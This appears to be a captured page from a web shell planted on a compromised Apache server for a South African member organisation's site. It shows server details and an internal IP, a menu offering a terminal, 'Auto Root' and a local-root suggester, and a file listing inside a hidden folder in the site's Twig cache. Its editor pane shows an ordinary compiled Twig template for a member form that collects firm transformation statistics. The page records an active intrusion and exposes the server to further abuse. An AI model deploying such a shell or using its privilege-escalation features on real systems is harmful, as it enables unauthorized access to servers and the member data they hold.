Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
87 /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
87024742a800a4cc5185845d85b64a1c.php
11.36
KB
-rwxrwxr-x
2026-05-18 12:54
87c7d8c1b3d84ba97da990bd6483676f.php
5.46
KB
-rwxrwxr-x
2026-05-18 12:54
87feebca174ef1f599d76157d451e30b.php
6.1
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* @Member/Portal/transformation_edit.html.twig */ class __TwigTemplate_b010641cbf3e506cf895daeaad3c5641 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->blocks = [ 'title' => [$this, 'block_title'], 'head_style' => [$this, 'block_head_style'], 'head_script' => [$this, 'block_head_script'], 'page_header_h1' => [$this, 'block_page_header_h1'], 'content' => [$this, 'block_content'], ]; } protected function doGetParent(array $context): bool|string|Template|TemplateWrapper { // line 1 return "base.html.twig"; } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; $this->parent = $this->load("base.html.twig", 1); yield from $this->parent->unwrap()->yield($context, array_merge($this->blocks, $blocks)); } // line 3 /** * @return iterable<null|scalar|\Stringable> */ public function block_title(array $context, array $blocks = []): iterable { $macros = $this->macros; yield "Transformation data — "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["firmName"] ?? null), "html", null, true); yield from []; } // line 5 /** * @return iterable<null|scalar|\Stringable> */ public function block_head_style(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 6 yield " "; yield from $this->yieldParentBlock("head_style", $context, $blocks); yield " "; // line 7 yield $this->extensions['Symfony\WebpackEncoreBundle\Twig\EntryFilesTwigExtension']->renderWebpackLinkTags("form"); yield " "; yield from []; } // line 10 /** * @return iterable<null|scalar|\Stringable> */ public function block_head_script(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 11 yield " "; yield from $this->yieldParentBlock("head_script", $context, $blocks); yield " "; // line 12 yield $this->extensions['Symfony\WebpackEncoreBundle\Twig\EntryFilesTwigExtension']->renderWebpackScriptTags("form"); yield " "; yield from []; } // line 15 /** * @return iterable<null|scalar|\Stringable> */ public function block_page_header_h1(array $context, array $blocks = []): iterable { $macros = $this->macros; yield "Member firm transformation statistics"; yield from []; } // line 17 /** * @return iterable<null|scalar|\Stringable> */ public function block_content(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 18 yield " "; $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(CoreExtension::getAttribute($this->env, $this->source, ($context["app"] ?? null), "flashes", ["success"], "method", false, false, false, 18)); foreach ($context['_seq'] as $context["_key"] => $context["message"]) { // line 19 yield " <div class=\"alert alert-success\">"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($context["message"], "html", null, true); yield "</div> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['message'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 21 yield " <p class=\"lead\">"; // line 22 yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["firmName"] ?? null), "html", null, true); yield "</p> "; // line 23 if ((($tmp = Twig\Extension\CoreExtension::trim(($context["contactName"] ?? null))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 24 yield " <p class=\"text-muted\">Signed in as mandated principal: "; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape(($context["contactName"] ?? null), "html", null, true); yield "</p> "; } // line 26 yield " <p class=\"mb-4\"> These fields match the data used on the transformation reporting dashboards (firm profile, three-year turnover, B-BBEE level, and staff counts by occupational band and demographic column). </p> "; // line 32 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->renderBlock(($context["form"] ?? null), 'form_start', ["attr" => ["class" => "well", "novalidate" => "novalidate"]]); yield " <h4 class=\"mt-4\">Firm summary</h4> <div class=\"row\"> <div class=\"col-md-6\">"; // line 36 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "smme", [], "any", false, false, false, 36), 'row'); yield "</div> <div class=\"col-md-6\">"; // line 37 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "bbbeeLevel", [], "any", false, false, false, 37), 'row'); yield "</div> <div class=\"col-md-6\">"; // line 38 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "blackOwned", [], "any", false, false, false, 38), 'row'); yield "</div> <div class=\"col-md-6\">"; // line 39 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "blackWomenOwned", [], "any", false, false, false, 39), 'row'); yield "</div> <div class=\"col-md-6\">"; // line 40 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "totalStaff", [], "any", false, false, false, 40), 'row'); yield "</div> <div class=\"col-md-6\">"; // line 41 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(CoreExtension::getAttribute($this->env, $this->source, ($context["form"] ?? null), "threeYearsAverageTurnover", [], "any", false, false, false, 41), 'row'); yield "</div> </div> "; // line 44 $context["demos"] = ["ma", "mc", "mi", "mw", "mn", "fa", "fc", "fi", "fw", "fn"]; // line 45 yield " "; $context["bands"] = ["trans_top" => "Top management", "trans_senior" => "Senior management", "trans_prof" => "Professionally qualified", "trans_skilled" => "Skilled", "trans_semi" => "Semi-skilled", "trans_unskill" => "Unskilled", "trans_temp" => "Temporary"]; // line 54 yield " "; // line 55 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["bands"] ?? null)); foreach ($context['_seq'] as $context["prefix"] => $context["bandTitle"]) { // line 56 yield " <h4 class=\"mt-5\">"; yield $this->env->getRuntime('Twig\Runtime\EscaperRuntime')->escape($context["bandTitle"], "html", null, true); yield "</h4> <p class=\"small text-muted\">Headcount per demographic column (same categories as management reporting graphs).</p> <div class=\"row\"> "; // line 59 $context['_parent'] = $context; $context['_seq'] = CoreExtension::ensureTraversable(($context["demos"] ?? null)); foreach ($context['_seq'] as $context["_key"] => $context["d"]) { // line 60 yield " "; $context["fname"] = (($context["prefix"] . "_") . $context["d"]); // line 61 yield " <div class=\"col-6 col-md-4 col-lg-3 mb-2\">"; yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock((($_v0 = ($context["form"] ?? null)) && is_array($_v0) || $_v0 instanceof ArrayAccess ? ($_v0[($context["fname"] ?? null)] ?? null) : null), 'row'); yield "</div> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['_key'], $context['d'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 63 yield " </div> "; } $_parent = $context['_parent']; unset($context['_seq'], $context['prefix'], $context['bandTitle'], $context['_parent']); $context = array_intersect_key($context, $_parent) + $_parent; // line 65 yield " <div class=\"row mt-4\"> <div class=\"col-12\"> <button type=\"submit\" class=\"btn btn-primary\">Save transformation data</button> <a class=\"btn btn-outline-secondary ms-2\" href=\""; // line 69 yield $this->extensions['Symfony\Bridge\Twig\Extension\RoutingExtension']->getPath("logout"); yield "\">Log out</a> </div> </div> "; // line 73 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->renderBlock(($context["form"] ?? null), 'form_end'); yield " "; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "@Member/Portal/transformation_edit.html.twig"; } /** * @codeCoverageIgnore */ public function isTraitable(): bool { return false; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 248 => 73, 241 => 69, 235 => 65, 228 => 63, 219 => 61, 216 => 60, 212 => 59, 205 => 56, 201 => 55, 198 => 54, 195 => 45, 193 => 44, 187 => 41, 183 => 40, 179 => 39, 175 => 38, 171 => 37, 167 => 36, 160 => 32, 152 => 26, 146 => 24, 144 => 23, 140 => 22, 137 => 21, 128 => 19, 123 => 18, 116 => 17, 105 => 15, 98 => 12, 93 => 11, 86 => 10, 79 => 7, 74 => 6, 67 => 5, 55 => 3, 44 => 1,); } public function getSourceContext(): Source { return new Source("", "@Member/Portal/transformation_edit.html.twig", "/var/www/v3.cesa.co.za/src/MemberBundle/Resources/views/Portal/transformation_edit.html.twig"); } }